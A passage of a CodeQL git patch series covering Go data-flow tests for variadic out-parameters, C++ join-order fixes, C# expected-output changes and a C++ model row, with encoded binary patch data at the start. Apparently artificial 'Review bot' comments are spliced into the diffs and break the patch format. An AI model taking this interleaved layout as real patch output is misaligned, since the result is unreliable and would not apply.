z+1!^Uthnoyvk<^P5SVDK>raf{01#36_oj~YkC-8rEaxtD7 z5X{INj{qT$L)<2q7SugY1}C3<$BN1g{}t-vro!8?^8b_U>&bt=`rH3Z6(9%jB>Z_h z#W7KF)9++>-+GC>Sa@(`o^bQPm1FgH=#+?&2}@J-qp5KdL9CU968A;_4LV(o-8d?w zo(x@}X3<+h3ru+$OqxjcL%5C*;k+`mAm?zsSwe@yHIfoCdYMnXR4POkqC(R<+A$?O zB_89V{_{CHRSgU%ykYk9|NcCVea^o#^&ivE>SsAhe*QoFozSfeBL2Y(rTDv`JX{%I z=5&*v^ry({Gx)QZa2@jRYmTqMGWv&K!(TaoWAtH*i&%Auz?4i^{-r};hg?g9V+
From 96c8af89433b0054f14bff982cb5215a8dd31010 Mon Sep 17 00:00:00 2001
From: Owen Mansel-Chan
Date: Fri, 6 Dec 2024 13:04:19 +0000
Subject: [PATCH 0892/1267] Test flow out of varargs param with function models
---
 .../semmle/go/dataflow/VarArgsWithFunctionModels/Flows.ql | 3 +++
 .../semmle/go/dataflow/VarArgsWithFunctionModels/go.mod | 2 +-
 .../semmle/go/dataflow/VarArgsWithFunctionModels/main.go | 8 +++++++-
 .../vendor/github.com/nonexistent/test/stub.go | 2 ++
 4 files changed, 13 insertions(+), 2 deletions(-)
diff --git a/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/Flows.ql b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/Flows.ql
index 80f711e3312..22da81845c0 100644
--- a/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/Flows.ql
+++ b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/Flows.ql
@@ -19,6 +19,9 @@ class SummaryModelTest extends DataFlow::FunctionModel {
 this.hasQualifiedName("github.com/nonexistent/test", "FunctionWithVarArgsParameter") and
 (inp.isParameter(_) and outp.isResult())
 or
+ this.hasQualifiedName("github.com/nonexistent/test", "FunctionWithVarArgsOutParameter") and
+ (inp.isParameter(0) and outp.isParameter(any(int i | i >= 1)))
+ or
 this.hasQualifiedName("github.com/nonexistent/test", "FunctionWithSliceOfStructsParameter") and
 (inp.isParameter(0) and outp.isResult())
 or
diff --git a/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/go.mod b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/go.mod
index ed18764ed28..cdb11f2ee6c 100644
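Review bot: The new disjunct for `FunctionWithVarArgsOutParameter` in Flows.ql has no comment explaining why the output is `outp.isParameter(any(int i | i >= 1))` rather than a single index. I would add `// flow from the first argument into every argument passed for the variadic out parameter (indices >= 1)` above it. The range of `i` is presumably bounded by `isParameter` itself, which is worth saying in the same comment because `i >= 1` alone does not bound it. The enclosing predicate starts and ends outside this hunk, so that cannot be confirmed from here.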
--- a/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/go.mod
+++ b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/go.mod
@@ -1,5 +1,5 @@
 module semmle.go.Packages
-go 1.17
+go 1.23
 require github.com/nonexistent/test v0.0.0-20200203000000-0000000000000
diff --git a/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/main.go b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/main.go
index f7248f1f6a2..e8d53eb9b28 100644
--- a/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/main.go
+++ b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/main.go
@@ -8,7 +8,7 @@ func source() string {
 return "untrusted data"
 }
-func sink(string) {
+func sink(any) {
 }
 func main() {
@@ -27,6 +27,12 @@ func main() {
 randomFunctionWithMoreThanOneParameter(1, 2, 3, 4, 5) // This is needed to make the next line pass, because we need to have seen a call to a function with at least 2 parameters for ParameterInput to exist with index 1.
 sink(test.FunctionWithVarArgsParameter(s0, s1)) // $ hasValueFlow="call to FunctionWithVarArgsParameter"
+ var out1 *string
+ var out2 *string
+ test.FunctionWithVarArgsOutParameter(source(), out1, out2)
+ sink(out1) // $ hasValueFlow="out1"
+ sink(out2) // $ hasValueFlow="out2"
+
 sliceOfStructs := []test.A{{Field: source()}}
 sink(sliceOfStructs[0].Field) // $ hasValueFlow="selection of Field"
diff --git a/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/vendor/github.com/nonexistent/test/stub.go b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/vendor/github.com/nonexistent/test/stub.go
index 66f3da7d659..b3e407fcaa7 100644
--- a/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/vendor/github.com/nonexistent/test/stub.go
+++ b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithFunctionModels/vendor/github.com/nonexistent/test/stub.go
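Review bot: `out1` and `out2` in the second main.go hunk are declared with `var out1 *string` and never pointed at anything, so the two expectations only check that the pointer value itself is reported at `sink(out1)` and `sink(out2)`. Callers of an out-parameter API normally read the pointee, so a companion case such as `s := ""; test.FunctionWithVarArgsOutParameter(source(), &s); sink(s)` would also show whether the flow reaches the data a query would see; whether that passes today is not visible from this hunk. The first hunk widens `sink(string)` to `sink(any)` for every existing call in the file, and a short comment like `// any, so that *string arguments can be passed` would record why. `main`'s body continues outside the hunk.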
@@ -15,6 +15,8 @@ func FunctionWithSliceParameter(s []string) string {
 func FunctionWithVarArgsParameter(s ...string) string {
 return ""
 }
+func FunctionWithVarArgsOutParameter(in string, out ...*string) {
+}
 func FunctionWithSliceOfStructsParameter(s []A) string {
 return ""
From 8cc4cd58c6e8e68bebb283146d6a723cc89b468f Mon Sep 17 00:00:00 2001
From: Owen Mansel-Chan
Date: Fri, 6 Dec 2024 13:41:10 +0000
Subject: [PATCH 0893/1267] Add failing test for flow out of varargs param with models-as-data
---
 .../VarArgsWithExternalFlow/Flows.expected | 2 +
 .../VarArgsWithExternalFlow/Flows.ext.yml | 21 ++++++++
 .../dataflow/VarArgsWithExternalFlow/Flows.ql | 22 ++++++++
 .../dataflow/VarArgsWithExternalFlow/go.mod | 5 ++
 .../dataflow/VarArgsWithExternalFlow/main.go | 51 +++++++++++++++++++
 .../github.com/nonexistent/test/stub.go | 31 +++++++++++
 .../vendor/modules.txt | 3 ++
 7 files changed, 135 insertions(+)
 create mode 100644 go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/Flows.expected
 create mode 100644 go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/Flows.ext.yml
 create mode 100644 go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/Flows.ql
 create mode 100644 go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/go.mod
 create mode 100644 go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/main.go
 create mode 100644 go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/vendor/github.com/nonexistent/test/stub.go
 create mode 100644 go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/vendor/modules.txt
diff --git a/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/Flows.expected b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/Flows.expected
new file mode 100644
index 00000000000..55e9aed2e93
--- /dev/null
+++ b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/Flows.expected
@@ -0,0 +1,2 @@ +testFailures +invalidModelRow diff --git a/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/Flows.ext.yml b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/Flows.ext.yml new file mode 100644 index 00000000000..ca3f9559536 --- /dev/null +++ b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/Flows.ext.yml @@ -0,0 +1,21 @@ +extensions: + - addsTo: + pack: codeql/go-all + extensible: summaryModel + data: + - ["github.com/nonexistent/test", "", False, "FunctionWithParameter", "", "", "Argument[0]", "ReturnValue", "value", "manual"] + - ["github.com/nonexistent/test", "", False, "FunctionWithSliceParameter", "", "", "Argument[0].ArrayElement", "ReturnValue", "value", "manual"] + - ["github.com/nonexistent/test", "", False, "FunctionWithVarArgsParameter", "", "", "Argument[0].ArrayElement", "ReturnValue", "value", "manual"] + - ["github.com/nonexistent/test", "", False, "FunctionWithVarArgsOutParameter", "", "", "Argument[0]", "Argument[1].ArrayElement", "value", "manual"] + - ["github.com/nonexistent/test", "", False, "FunctionWithSliceOfStructsParameter", "", "", "Argument[0].ArrayElement.Field[github.com/nonexistent/test.A.Field]", "ReturnValue", "value", "manual"] + - ["github.com/nonexistent/test", "", False, "FunctionWithVarArgsOfStructsParameter", "", "", "Argument[0].ArrayElement.Field[github.com/nonexistent/test.A.Field]", "ReturnValue", "value", "manual"] + - addsTo: + pack: codeql/go-all + extensible: sourceModel + data: + - ["github.com/nonexistent/test", "", False, "VariadicSource", "", "", "Argument[0]", "qltest", "manual"] + - addsTo: + pack: codeql/go-all + extensible: sinkModel + data: + - ["github.com/nonexistent/test", "", False, "VariadicSink", "", "", "Argument[0]", "qltest", "manual"] 
diff --git a/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/Flows.ql b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/Flows.ql new file mode 100644 index 00000000000..0f0b9dbe22d --- /dev/null +++ b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/Flows.ql @@ -0,0 +1,22 @@ +import go +import semmle.go.dataflow.ExternalFlow +import ModelValidation +import TestUtilities.InlineFlowTest + +module Config implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + sourceNode(source, "qltest") + or + exists(Function fn | fn.hasQualifiedName(_, ["source", "taint"]) | + source = fn.getACall().getResult() + ) + } + + predicate isSink(DataFlow::Node sink) { + sinkNode(sink, "qltest") + or + exists(Function fn | fn.hasQualifiedName(_, "sink") | sink = fn.getACall().getAnArgument()) + } +} + +import FlowTest diff --git a/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/go.mod b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/go.mod new file mode 100644 index 00000000000..cdb11f2ee6c --- /dev/null +++ b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/go.mod @@ -0,0 +1,5 @@ +module semmle.go.Packages + +go 1.23 + +require github.com/nonexistent/test v0.0.0-20200203000000-0000000000000 diff --git a/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/main.go b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/main.go new file mode 100644 index 00000000000..324864edd22 --- /dev/null +++ b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/main.go 
@@ -0,0 +1,51 @@ +package main + +import ( + "github.com/nonexistent/test" +) + +func source() string { + return "untrusted data" +} + +func sink(any) { +} + +func main() { + s := source() + sink(test.FunctionWithParameter(s)) // $ hasValueFlow="call to FunctionWithParameter" + + stringSlice := []string{source()} + sink(stringSlice[0]) // $ hasValueFlow="index expression" + + s0 := "" + s1 := source() + sSlice := []string{s0, s1} + sink(test.FunctionWithParameter(sSlice[1])) // $ hasValueFlow="call to FunctionWithParameter" + sink(test.FunctionWithSliceParameter(sSlice)) // $ hasValueFlow="call to FunctionWithSliceParameter" + sink(test.FunctionWithVarArgsParameter(sSlice...)) // $ hasValueFlow="call to FunctionWithVarArgsParameter" + sink(test.FunctionWithVarArgsParameter(s0, s1)) // $ hasValueFlow="call to FunctionWithVarArgsParameter" + + var out1 *string + var out2 *string + test.FunctionWithVarArgsOutParameter(source(), out1, out2) + sink(out1) // $ MISSING: hasValueFlow="out1" + sink(out2) // $ MISSING: hasValueFlow="out2" + + sliceOfStructs := []test.A{{Field: source()}} + sink(sliceOfStructs[0].Field) // $ hasValueFlow="selection of Field" + + a0 := test.A{Field: ""} + a1 := test.A{Field: source()} + aSlice := []test.A{a0, a1} + sink(test.FunctionWithSliceOfStructsParameter(aSlice)) // $ hasValueFlow="call to FunctionWithSliceOfStructsParameter" + sink(test.FunctionWithVarArgsOfStructsParameter(aSlice...)) // $ hasValueFlow="call to FunctionWithVarArgsOfStructsParameter" + sink(test.FunctionWithVarArgsOfStructsParameter(a0, a1)) // $ hasValueFlow="call to FunctionWithVarArgsOfStructsParameter" + + var variadicSource string + test.VariadicSource(&variadicSource) + sink(variadicSource) // $ MISSING: hasTaintFlow="variadicSource" + + test.VariadicSink(source()) // $ hasTaintFlow="[]type{args}" + +} 
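Review bot: The three `MISSING:` expectations in this file (`sink(out1)`, `sink(out2)` and `sink(variadicSource)`) carry no comment saying why the flow is not found. A reader of the test cannot tell a known gap from a regression without going to the commit history. A one-line comment above each group, such as `// Not yet supported: flow out of a variadic parameter defined via models-as-data`, would keep that reason next to the expectation.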
diff --git a/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/vendor/github.com/nonexistent/test/stub.go b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/vendor/github.com/nonexistent/test/stub.go new file mode 100644 index 00000000000..f23bc1d0481 --- /dev/null +++ b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/vendor/github.com/nonexistent/test/stub.go @@ -0,0 +1,31 @@ +package test + +type A struct { + Field string +} + +func FunctionWithParameter(s string) string { + return "" +} + +func FunctionWithSliceParameter(s []string) string { + return "" +} + +func FunctionWithVarArgsParameter(s ...string) string { + return "" +} +func FunctionWithVarArgsOutParameter(in string, out ...*string) { +} + +func FunctionWithSliceOfStructsParameter(s []A) string { + return "" +} + +func FunctionWithVarArgsOfStructsParameter(s ...A) string { + return "" +} + +func VariadicSource(s ...*string) {} + +func VariadicSink(s ...string) {} diff --git a/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/vendor/modules.txt b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/vendor/modules.txt new file mode 100644 index 00000000000..b62dbf8819b --- /dev/null +++ b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/vendor/modules.txt @@ -0,0 +1,3 @@ +# github.com/nonexistent/test v0.0.0-20200203000000-0000000000000 +## explicit +github.com/nonexistent/test From 67572712ea53c27657abf0f5b34176a901910489 Mon Sep 17 00:00:00 2001 
From: Owen Mansel-Chan Date: Fri, 6 Dec 2024 14:54:23 +0000 Subject: [PATCH 0894/1267] Fix flow out of varargs param with models-as-data This still doesn't allow for a variadic out parameter to be defined as a source using MaD. This is due to the lack of an implicit store step at sources, to match implicit read steps at sinks. --- go/ql/lib/semmle/go/dataflow/internal/ContainerFlow.qll | 5 +++++ go/ql/lib/semmle/go/dataflow/internal/DataFlowNodes.qll | 3 +++ .../semmle/go/dataflow/VarArgsWithExternalFlow/main.go | 4 ++-- 3 files changed, 10 insertions(+), 2 deletions(-) diff --git a/go/ql/lib/semmle/go/dataflow/internal/ContainerFlow.qll b/go/ql/lib/semmle/go/dataflow/internal/ContainerFlow.qll index 9f07693b7ea..bbef53935ad 100644 --- a/go/ql/lib/semmle/go/dataflow/internal/ContainerFlow.qll +++ b/go/ql/lib/semmle/go/dataflow/internal/ContainerFlow.qll @@ -66,6 +66,11 @@ predicate containerReadStep(Node node1, Node node2, Content c) { ( node2.(Read).readsElement(node1, _) or + exists(ImplicitVarargsSlice ivs | + node1.(PostUpdateNode).getPreUpdateNode() = ivs and + node2.(PostUpdateNode).getPreUpdateNode() = ivs.getCallNode().getAnImplicitVarargsArgument() + ) + or node2.(RangeElementNode).getBase() = node1 or // To model data flow from array elements of the base of a `SliceNode` to diff --git a/go/ql/lib/semmle/go/dataflow/internal/DataFlowNodes.qll b/go/ql/lib/semmle/go/dataflow/internal/DataFlowNodes.qll index cc353ab64df..05283454cff 100644 --- a/go/ql/lib/semmle/go/dataflow/internal/DataFlowNodes.qll +++ b/go/ql/lib/semmle/go/dataflow/internal/DataFlowNodes.qll @@ -845,6 +845,9 @@ module Public { or preupd = getAWrittenNode() or + preupd instanceof ImplicitVarargsSlice and + mutableType(preupd.(ImplicitVarargsSlice).getType().(SliceType).getElementType()) + or preupd = any(ArgumentNode arg).getACorrespondingSyntacticArgument() and mutableType(preupd.getType()) ) and 
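Review bot: The new disjunct in `containerReadStep` relates two post-update nodes, unlike the neighbouring disjuncts that read from a container into a value, and it has no comment saying so. I would add above it something like `// Flow out of a variadic parameter: read from the post-update node of the implicit varargs slice to the post-update node of each argument stored in it.` Because it uses `getAnImplicitVarargsArgument()`, the step reaches every implicit variadic argument of the call rather than one index; that looks intended, but it affects precision and is worth stating in the comment. The predicate body continues outside the hunk.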
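Review bot: The disjunct added in DataFlowNodes.qll gives an `ImplicitVarargsSlice` a post-update node only when its element type is mutable, but nothing in the hunk says why or ties it to the read step added in ContainerFlow.qll. A comment such as `// The implicit varargs slice needs a post-update node so that element writes made by the callee can flow back to the variadic arguments.` would make the dependency between the two files visible. The enclosing definition starts and ends outside the hunk, so I cannot tell whether the other disjuncts are documented in the same way.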
diff --git a/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/main.go b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/main.go index 324864edd22..f90f429b12a 100644 --- a/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/main.go +++ b/go/ql/test/library-tests/semmle/go/dataflow/VarArgsWithExternalFlow/main.go @@ -29,8 +29,8 @@ func main() { var out1 *string var out2 *string test.FunctionWithVarArgsOutParameter(source(), out1, out2) - sink(out1) // $ MISSING: hasValueFlow="out1" - sink(out2) // $ MISSING: hasValueFlow="out2" + sink(out1) // $ hasValueFlow="out1" + sink(out2) // $ hasValueFlow="out2" sliceOfStructs := []test.A{{Field: source()}} sink(sliceOfStructs[0].Field) // $ hasValueFlow="selection of Field" From 75331ea2689b34a3965a1c63ca65a8b47be0488d Mon Sep 17 00:00:00 2001 From: Owen Mansel-Chan Date: Fri, 6 Dec 2024 15:03:34 +0000 Subject: [PATCH 0895/1267] Add change note --- .../2024-12-06-improve-flow-out-of-variadic-parameter.md | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 go/ql/lib/change-notes/2024-12-06-improve-flow-out-of-variadic-parameter.md diff --git a/go/ql/lib/change-notes/2024-12-06-improve-flow-out-of-variadic-parameter.md b/go/ql/lib/change-notes/2024-12-06-improve-flow-out-of-variadic-parameter.md new file mode 100644 index 00000000000..8244ba06994 --- /dev/null +++ b/go/ql/lib/change-notes/2024-12-06-improve-flow-out-of-variadic-parameter.md @@ -0,0 +1,4 @@ +--- +category: minorAnalysis +--- +* Data flow out of variadic parameters now works in more situations. Summary models defined using models-as-data work. Source models defined using models-as-data do not work yet. From c51153203b42d679f86f3472dd374c9b681ce7d8 Mon Sep 17 00:00:00 2001 
From: Mathias Vorreiter Pedersen Date: Fri, 6 Dec 2024 13:48:47 +0000 Subject: [PATCH 0896/1267] C++: Fix two bad joins that happen in 'UnboundedWrite' on #18207. --- .../cpp/ir/dataflow/internal/DataFlowUtil.qll | 29 +++++++++++++------ .../cpp/ir/dataflow/internal/SsaInternals.qll | 1 + 2 files changed, 21 insertions(+), 9 deletions(-) diff --git a/cpp/ql/lib/semmle/code/cpp/ir/dataflow/internal/DataFlowUtil.qll b/cpp/ql/lib/semmle/code/cpp/ir/dataflow/internal/DataFlowUtil.qll index d0935bb76d2..32dec1355ea 100644 --- a/cpp/ql/lib/semmle/code/cpp/ir/dataflow/internal/DataFlowUtil.qll +++ b/cpp/ql/lib/semmle/code/cpp/ir/dataflow/internal/DataFlowUtil.qll @@ -2275,6 +2275,12 @@ private predicate guardControlsPhiInput( */ signature predicate guardChecksSig(IRGuardCondition g, Expr e, boolean branch); +bindingset[g, n] +pragma[inline_late] +private predicate controls(IRGuardCondition g, Node n, boolean edge) { + g.controls(n.getBasicBlock(), edge) +} + /** * Provides a set of barrier nodes for a guard that validates an expression. * @@ -2318,15 +2324,17 @@ module BarrierGuard { exists(IRGuardCondition g, Expr e, ValueNumber value, boolean edge | e = value.getAnInstruction().getConvertedResultExpression() and result.asConvertedExpr() = e and - guardChecks(g, value.getAnInstruction().getConvertedResultExpression(), edge) and - g.controls(result.getBasicBlock(), edge) + guardChecks(g, + pragma[only_bind_into](value.getAnInstruction().getConvertedResultExpression()), edge) and + controls(g, result, edge) ) or exists( IRGuardCondition g, boolean branch, Ssa::DefinitionExt def, IRBlock input, Ssa::PhiNode phi | guardChecks(g, def.getARead().asOperand().getDef().getConvertedResultExpression(), branch) and - guardControlsPhiInput(g, branch, def, input, phi) and + guardControlsPhiInput(g, branch, def, pragma[only_bind_into](input), + pragma[only_bind_into](phi)) and result = TSsaPhiInputNode(phi, input) ) } 
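Review bot: The new private predicate `controls` in the first DataFlowUtil.qll hunk has no QLDoc, and neither it nor the `pragma[only_bind_into]` wrappers in the later hunks (`@@ -2318`, `@@ -2404`, `@@ -2414`) say that they exist only to steer join order. Without that, a later cleanup could put `g.controls(result.getBasicBlock(), edge)` back inline and reintroduce the bad join the commit message describes. I would add a QLDoc comment above `bindingset[g, n]` stating that the predicate holds if the guard controls the basic block of the node on the given edge, and that it is late-inlined to avoid a bad join order in the barrier guard modules.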
@@ -2404,8 +2412,9 @@ module BarrierGuard { exists(IRGuardCondition g, Expr e, ValueNumber value, boolean edge | e = value.getAnInstruction().getConvertedResultExpression() and result.asIndirectConvertedExpr(indirectionIndex) = e and - guardChecks(g, value.getAnInstruction().getConvertedResultExpression(), edge) and - g.controls(result.getBasicBlock(), edge) + guardChecks(g, + pragma[only_bind_into](value.getAnInstruction().getConvertedResultExpression()), edge) and + controls(g, result, edge) ) or exists( @@ -2414,7 +2423,8 @@ module BarrierGuard { guardChecks(g, def.getARead().asIndirectOperand(indirectionIndex).getDef().getConvertedResultExpression(), branch) and - guardControlsPhiInput(g, branch, def, input, phi) and + guardControlsPhiInput(g, branch, def, pragma[only_bind_into](input), + pragma[only_bind_into](phi)) and result = TSsaPhiInputNode(phi, input) ) } @@ -2443,17 +2453,18 @@ module InstructionBarrierGuard Date: Fri, 6 Dec 2024 15:18:03 +0000 Subject: [PATCH 0897/1267] C#: Accept test changes. --- .../test/library-tests/dataflow/library/FlowSummaries.expected | 2 +- .../dataflow/library/FlowSummariesFiltered.expected | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/csharp/ql/test/library-tests/dataflow/library/FlowSummaries.expected b/csharp/ql/test/library-tests/dataflow/library/FlowSummaries.expected index 25e4a9317eb..a7c87af0bfe 100644 --- a/csharp/ql/test/library-tests/dataflow/library/FlowSummaries.expected +++ b/csharp/ql/test/library-tests/dataflow/library/FlowSummaries.expected 
@@ -1513,7 +1513,7 @@ summary | Microsoft.AspNetCore.Mvc;Controller;View;(System.String);Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewBag];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];value;manual | | Microsoft.AspNetCore.Mvc;Controller;View;(System.String);Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];value;manual | | Microsoft.AspNetCore.Mvc;Controller;View;(System.String,System.Object);Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewBag];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];value;manual | -| Microsoft.AspNetCore.Mvc;Controller;View;(System.String,System.Object);Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];taint;manual | +| Microsoft.AspNetCore.Mvc;Controller;View;(System.String,System.Object);Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];value;manual | | Microsoft.AspNetCore.Mvc;ControllerBase;TryUpdateModelAsync;(System.Object,System.Type,System.String,Microsoft.AspNetCore.Mvc.ModelBinding.IValueProvider,System.Func);Argument[4];Argument[4].Parameter[delegate-self];value;hq-generated | | 
Microsoft.AspNetCore.Mvc;ControllerBase;TryUpdateModelAsync;(TModel,System.String,Microsoft.AspNetCore.Mvc.ModelBinding.IValueProvider,System.Func);Argument[3];Argument[3].Parameter[delegate-self];value;hq-generated | | Microsoft.AspNetCore.Mvc;ControllerBase;TryUpdateModelAsync;(TModel,System.String,System.Func);Argument[2];Argument[2].Parameter[delegate-self];value;hq-generated | diff --git a/csharp/ql/test/library-tests/dataflow/library/FlowSummariesFiltered.expected b/csharp/ql/test/library-tests/dataflow/library/FlowSummariesFiltered.expected index 4d315854b67..1d6443748b8 100644 --- a/csharp/ql/test/library-tests/dataflow/library/FlowSummariesFiltered.expected +++ b/csharp/ql/test/library-tests/dataflow/library/FlowSummariesFiltered.expected 
@@ -562,7 +562,7 @@ | Microsoft.AspNetCore.Mvc;Controller;View;(System.String);Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewBag];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];value;manual | | Microsoft.AspNetCore.Mvc;Controller;View;(System.String);Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];value;manual | | Microsoft.AspNetCore.Mvc;Controller;View;(System.String,System.Object);Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewBag];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];value;manual | -| Microsoft.AspNetCore.Mvc;Controller;View;(System.String,System.Object);Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];taint;manual | +| Microsoft.AspNetCore.Mvc;Controller;View;(System.String,System.Object);Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value];value;manual | | Microsoft.AspNetCore.Mvc;ControllerBase;TryUpdateModelAsync;(System.Object,System.Type,System.String,Microsoft.AspNetCore.Mvc.ModelBinding.IValueProvider,System.Func);Argument[4];Argument[4].Parameter[delegate-self];value;hq-generated | | 
Microsoft.AspNetCore.Mvc;ControllerBase;TryUpdateModelAsync;(TModel,System.String,Microsoft.AspNetCore.Mvc.ModelBinding.IValueProvider,System.Func);Argument[3];Argument[3].Parameter[delegate-self];value;hq-generated | | Microsoft.AspNetCore.Mvc;ControllerBase;TryUpdateModelAsync;(TModel,System.String,System.Func);Argument[2];Argument[2].Parameter[delegate-self];value;hq-generated | From d0bf3b84e4c263789324ae4f8cb33ca70fedb009 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Fri, 6 Dec 2024 15:27:17 +0000 Subject: [PATCH 0898/1267] C++: Add missing MaD row for move constructor. --- cpp/ql/lib/ext/CComBSTR.model.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/cpp/ql/lib/ext/CComBSTR.model.yml b/cpp/ql/lib/ext/CComBSTR.model.yml index b578956edec..0cbf021a8a9 100644 --- a/cpp/ql/lib/ext/CComBSTR.model.yml +++ b/cpp/ql/lib/ext/CComBSTR.model.yml @@ -8,6 +8,7 @@ extensions: - ["", "CComBSTR", True, "CComBSTR", "(int,LPCSTR)", "", "Argument[*1]", "Argument[-1]", "value", "manual"] - ["", "CComBSTR", True, "CComBSTR", "(int,LPCOLESTR)", "", "Argument[*1]", "Argument[-1]", "value", "manual"] - ["", "CComBSTR", True, "CComBSTR", "(const CComBSTR&)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] + - ["", "CComBSTR", True, "CComBSTR", "(CComBSTR &&)", "", "Argument[*0]", "Argument[-1]", "value", "manual"] - ["", "CComBSTR", True, "Append", "(const CComBSTR&)", "", "Argument[*0]", "Argument[-1]", "taint", "manual"] - ["", "CComBSTR", True, "Append", "(wchar_t)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] - ["", "CComBSTR", True, "Append", "(char)", "", "Argument[0]", "Argument[-1]", "taint", "manual"] From 198417c63aa0d73d249ece159bafbf814f52ce58 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Fri, 6 Dec 2024 16:28:04 +0100 Subject: [PATCH 0899/1267] Swift: fix filename case for prebuilt artifacts --- swift/third_party/load.bzl | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) 
